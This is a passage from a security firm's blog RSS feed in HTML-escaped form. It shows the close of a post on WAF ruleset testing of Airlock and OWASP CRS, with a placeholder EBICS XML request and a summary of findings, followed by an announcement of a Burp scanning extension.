&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-14" name="rest_code_313e8462ce9641868a3fb75914512cae-14" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-14"&gt;&lt;/a&gt;            &amp;lt;Product InstituteID="AAA" Language="de"&amp;gt;AAA&amp;lt;/Product&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-15" name="rest_code_313e8462ce9641868a3fb75914512cae-15" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-15"&gt;&lt;/a&gt;            &amp;lt;OrderDetails&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-16" name="rest_code_313e8462ce9641868a3fb75914512cae-16" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-16"&gt;&lt;/a&gt;                &amp;lt;OrderType&amp;gt;AAA&amp;lt;/OrderType&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-17" name="rest_code_313e8462ce9641868a3fb75914512cae-17" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-17"&gt;&lt;/a&gt;                &amp;lt;OrderAttribute&amp;gt;AAA&amp;lt;/OrderAttribute&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-18" name="rest_code_313e8462ce9641868a3fb75914512cae-18" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-18"&gt;&lt;/a&gt;            &amp;lt;/OrderDetails&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-19" name="rest_code_313e8462ce9641868a3fb75914512cae-19" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-19"&gt;&lt;/a&gt;            &amp;lt;SecurityMedium&amp;gt;0000&amp;lt;/SecurityMedium&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-20" name="rest_code_313e8462ce9641868a3fb75914512cae-20" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-20"&gt;&lt;/a&gt;        &amp;lt;/static&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-21" name="rest_code_313e8462ce9641868a3fb75914512cae-21" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-21"&gt;&lt;/a&gt;        &amp;lt;mutable/&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-22" name="rest_code_313e8462ce9641868a3fb75914512cae-22" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-22"&gt;&lt;/a&gt;    &amp;lt;/header&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-23" name="rest_code_313e8462ce9641868a3fb75914512cae-23" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-23"&gt;&lt;/a&gt;    &amp;lt;body&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-24" name="rest_code_313e8462ce9641868a3fb75914512cae-24" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-24"&gt;&lt;/a&gt;        &amp;lt;DataTransfer&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-25" name="rest_code_313e8462ce9641868a3fb75914512cae-25" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-25"&gt;&lt;/a&gt;            &amp;lt;OrderData&amp;gt;AAA&amp;lt;/OrderData&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-26" name="rest_code_313e8462ce9641868a3fb75914512cae-26" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-26"&gt;&lt;/a&gt;        &amp;lt;/DataTransfer&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-27" name="rest_code_313e8462ce9641868a3fb75914512cae-27" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-27"&gt;&lt;/a&gt;    &amp;lt;/body&amp;gt;
&lt;a id="rest_code_313e8462ce9641868a3fb75914512cae-28" name="rest_code_313e8462ce9641868a3fb75914512cae-28" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#rest_code_313e8462ce9641868a3fb75914512cae-28"&gt;&lt;/a&gt;&amp;lt;/ebicsUnsecuredRequest&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;While Airlock doesn't check file contents in-depth in general, it is &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/issues/2847"&gt;still an open issue for CRS&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="summary"&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;The above results show what went through the Airlock WAF. But after looking at the above results, everyone can agree that it's not easy to tell what that means exactly and what is the right thing to do. Should Airlock block more? Are those useful attack strings? We decided that we do not want to pick apart all of the payloads and argue about them. We provide them for you as-is, so you can draw your own conclusions.&lt;/p&gt;
&lt;p&gt;After talking to Ergon, they opened internal tickets and said they are going to look at certain things from the above list. We agree that certain payloads are not yet full attacks, for other payloads we were expecting Airlock to block more.&lt;/p&gt;
&lt;p&gt;For CRS, one of the two mentioned issues is fixed; the other is still open.&lt;/p&gt;
&lt;p&gt;We have seen that Airlock did not block certain tests from CRS. Overall, it gave the impression of resulting in fewer false positives, as it seems to rather allow than block legitimate users. On the other hand, if you are looking for Server Side Request Forgery (SSRF) protection by default in URLs (URLs in URLs), you have to actively configure that when using Airlock. The impression of more false positives with CRS is probably in the nature of the project and again: whoever uses CRS must modify it to fit their needs. For example, if you use CRS and have users in Germany, &lt;a class="reference external" href="https://github.com/coreruleset/coreruleset/issues/3644"&gt;users with first name Axel could get pretty upset&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Depending on your preference, you can tweak your WAF to reduce either false positives or false negatives. Some people prefer a WAF without false negatives because otherwise it can be bypassed. Other people will prefer fewer false positives because they are afraid to block legitimate cases or do not want to invest the time to configure every use case. When trying to argue in either direction, we seem to run in circles.&lt;/p&gt;
&lt;p&gt;Are you upset about any of our statements above? See, we told you it's a controversial topic to talk about.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="thanks"&gt;
&lt;h2&gt;Thanks&lt;/h2&gt;
&lt;p&gt;We would like to thank our customer who was open to let us look at the WAF in a whitebox approach and who agreed to do a publication of the results. Thanks goes out to the OWASP CRS team who responded to all our questions on Slack. Thanks also to Ergon for the call and feedback.&lt;/p&gt;
&lt;aside class="footnote-list brackets"&gt;
&lt;aside class="footnote brackets" id="footnote-1" role="doc-footnote"&gt;
&lt;span class="label"&gt;&lt;span class="fn-bracket"&gt;[&lt;/span&gt;&lt;a role="doc-backlink" href="https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/#footnote-reference-1"&gt;1&lt;/a&gt;&lt;span class="fn-bracket"&gt;]&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;42&lt;/p&gt;
&lt;/aside&gt;
&lt;/aside&gt;
&lt;/section&gt;</description><guid>https://www.pentagrid.ch/de/blog/airlock-web-application-firewall-ruleset-testing-and-waf-bypasses/</guid><pubDate>Wed, 11 Dec 2024 12:00:00 GMT</pubDate></item><item><title>Improving web application security testing with the Pentagrid Scan Controller</title><link>https://www.pentagrid.ch/de/blog/improving-web-application-security-testing-with-pentagrid-scan-controller/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;We're back with another helpful Portswigger Burp Pro Proxy extension that you shouldn't miss if you do web application security analysis. This time the wasteful approach of Burp's feature "Actively scan all in-scope traffic" triggered the development of a new extension called Pentagrid Scan Controller, because there are several improvements possible and desirable.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;p&gt;For example, Burp's default scanner actively scans static resources on the server, which seems useless in many cases, so the extension will not do that by default. But the power of the extension lies in all the configuration, you can do yourself to improve the automatic active scanning by deciding what should be scanned and what shouldn't. It also takes the entire concept one level higher up, because you define what you think are interesting HTTP requests and what not. This allows the extension to show you a ranked view of requests and as a tester you now know where to spend the rest of your manual testing time after Burp's scanner ran. Another improvement is in the area of repeatability of requests. The extension will figure out if a requests is repeatable at all (because that's necessary to do proper scanning). If a request is not repeatable it will be made repeatable or ignored (you can see the decision in the UI), because there is usually no point in scanning non-repeatable requests.&lt;/p&gt;
&lt;p&gt;You can head over to the &lt;a class="reference external" href="https://github.com/pentagridsec/PentagridScanController"&gt;Pentagrid Scan Controller github page&lt;/a&gt;, where the extension was published as open source. Visit the official &lt;a class="reference external" href="https://portswigger.net/bappstore/e3dde890bdce4ae4bcef0d97019f5d46"&gt;Burp BApp store page of Pentagrid Scan Controller&lt;/a&gt; or load it directly inside Burp Pro via the BApp store. We recommend to watch the &lt;a class="reference external" href="https://www.youtube.com/watch?v=aFMTzFfX1Z4"&gt;area41.io talk of Tobias Ospelt about improving web application scanning&lt;/a&gt; which explains the issues of Burp scanner, what the extension will improve and how you can use the extension. If you want to skip to the extension part directly, you can watch the &lt;a class="reference external" href="https://youtu.be/aFMTzFfX1Z4?t=1460"&gt;talk from 24:20 min&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The extension version 0.1 already has many features, such as:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Scanning only in-scope items&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Different deduplication techniques of items already scanned&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Ignoring requests if the URL or the entire request matches a certain regex&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Delays before repeatability checks or scans, which allows you to browse the website for a while without being disturbed. Additionally, if a request turns non-repatable after 10 seconds it's better not to scan it at all and let you know.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Scanning requests that are not repeatable (not recommended)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Building your own "interesting score" by URL file extension, HTTP status code, HTTP method and number of parameters. Define the score values.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Changing the heuristic keywords to figure out if a request is repeatable or not&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Reimplemented JSON, XML and multipart injection. This was necessary, because extensions in Burp can currently not set a parameter value of JSON bodies through the official Burp API.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Added Non-Standard-HTTP header and URL path injection&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Thread pooling to make sure Burp Proxy is never waiting for the extension (performance)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Make requests repeatable by using Hackvertor tags and show it in the UI. This means you can reuse the repeatable request in other tools such as the Burp Repeater.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;The usual Burp extender API workarounds such as project-level storage.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Hiding items in the table&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We're currently working on a new version of the extension where the following things will change:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;New feature: Ignoring requests if the response matches a certain regex&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: Influence "interesting score" by response content-type (disabled by default as URL file extensions are usually sufficient)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: To declutter the UI, most options will be hidden by default and there is a button to toggle advanced options.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: The extension UI is divided into more tabs which group options together.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;New feature: Divide repeatability reasoning and scan reasoning in the UI&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We are also going to add additional scan capabilities (like ActiveScan++), for example:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;Add non-standard HTTP headers as insertion points&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add URL paths as insertion points (often used as parameters in REST APIs)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add Bearer Authorization HTTP header as an insertion point, this is important because Burp's new scanner checks for JSON Web Tokens (JWT) and is not yet checking the default "Authorization: Bearer ey[...]" location.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Add Basic Authorization HTTP header as an insertion point (username:password in base64)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Automated Smart Content Discovery as part of scanning, meaning automated &lt;a class="reference external" href="https://github.com/hannob/snallygaster"&gt;Snallygaster&lt;/a&gt; checks are performed per directory.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;a class="reference external image-reference" href="https://www.pentagrid.ch/images/202208_pentagrid_Scan_controller_snallygaster.png"&gt;
&lt;img alt="Scanner options showing advanced smart content discovery options." class="align-center" src="https://www.pentagrid.ch/images/202208_pentagrid_Scan_controller_snallygaster.thumbnail.png"&gt;
&lt;/a&gt;
&lt;p&gt;So stay tuned for the next release.&lt;/p&gt;
&lt;!-- We are hiring! Pentagrid is looking for `Junior and Senior IT Security Analysts in Berlin and Buchs, St. Gallen &lt;link://slug/career&gt;`_. --&gt;</description><guid>https://www.pentagrid.ch/de/blog/improving-web-application-security-testing-with-pentagrid-scan-controller/</guid><pubDate>Tue, 23 Aug 2022 12:42:00 GMT</pubDate></item></channel></rss>